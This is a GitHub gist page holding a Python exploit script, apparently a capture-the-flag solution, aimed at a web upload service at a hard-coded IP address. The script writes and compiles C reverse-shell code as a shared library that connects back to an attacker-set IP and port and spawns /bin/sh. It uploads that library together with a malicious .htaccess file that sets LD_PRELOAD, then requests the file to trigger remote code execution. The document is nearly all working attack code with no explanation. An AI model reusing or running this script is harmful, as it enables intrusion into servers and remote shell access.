Skip to content

Instantly share code, notes, and snippets.

@0x3c3e

0x3c3e/rwdn.py Secret

Last active January 24, 2022 11:32
Download ZIP

Revisions

  1. 0x3c3e renamed this gist Jan 23, 2022. 1 changed file with 0 additions and 0 deletions.
    0 rwnd.py → rwdn.py
    View file
    File renamed without changes.
  2. 0x3c3e created this gist Jan 23, 2022.
    88 changes: 88 additions & 0 deletions rwnd.py
    View file
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,88 @@
    import requests
    import subprocess

    IP = None
    PORT = None


    def compile():
    source = f"""
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>
    int foo(){{
    struct sockaddr_in revsockaddr;
    int sockt = socket(AF_INET, SOCK_STREAM, 0);
    revsockaddr.sin_family = AF_INET;
    revsockaddr.sin_port = htons({PORT});
    revsockaddr.sin_addr.s_addr = inet_addr("{IP}");
    connect(sockt, (struct sockaddr *) &revsockaddr,
    sizeof(revsockaddr));
    dup2(sockt, 0);
    dup2(sockt, 1);
    dup2(sockt, 2);
    char * const argv[] = {{"/bin/sh", NULL}};
    execve("/bin/sh", argv, NULL);
    return 0;
    }}
    void _init() {{
    unsetenv("LD_PRELOAD");
    foo();
    }}
    """
    with open("/tmp/test.c", "w") as f:
    f.write(source)
    subprocess.run(
    [
    "gcc",
    "-shared",
    "-fPIC",
    "/tmp/test.c",
    "-nostartfiles",
    "-o",
    "/tmp/test.so",
    ]
    )


    def upload(filename, content):
    uid = requests.post(
    "http://47.243.75.225:31337/upload?formid=a",
    files={
    "a": ("a", content),
    },
    )
    print(uid.text)
    requests.post(
    "http://47.243.75.225:31337/upload?formid=a",
    files={"a": (filename, content), "constuctor": ("boo.txt", "boo.txt")},
    )
    return uid.text.split("/")[-2]


    print("compiling payload")
    compile()
    so = upload("hack.so", open("/tmp/test.so", "rb").read())
    ht = f"""
    <Files ~ "^.ht">
    Require all granted
    Order allow,deny
    Allow from all
    SetEnv LD_PRELOAD /var/www/html/{so}/hack.so
    SetOutputFilter 7f39f8317fgzip
    </Files>
    """
    print("uploading .htaccess")
    url = "http://47.243.75.225:31338/" + upload(".htaccess", ht) + "/.htaccess"
    requests.get(url)
    print("triggering LD_PRELOAD")
    print("PWNED?")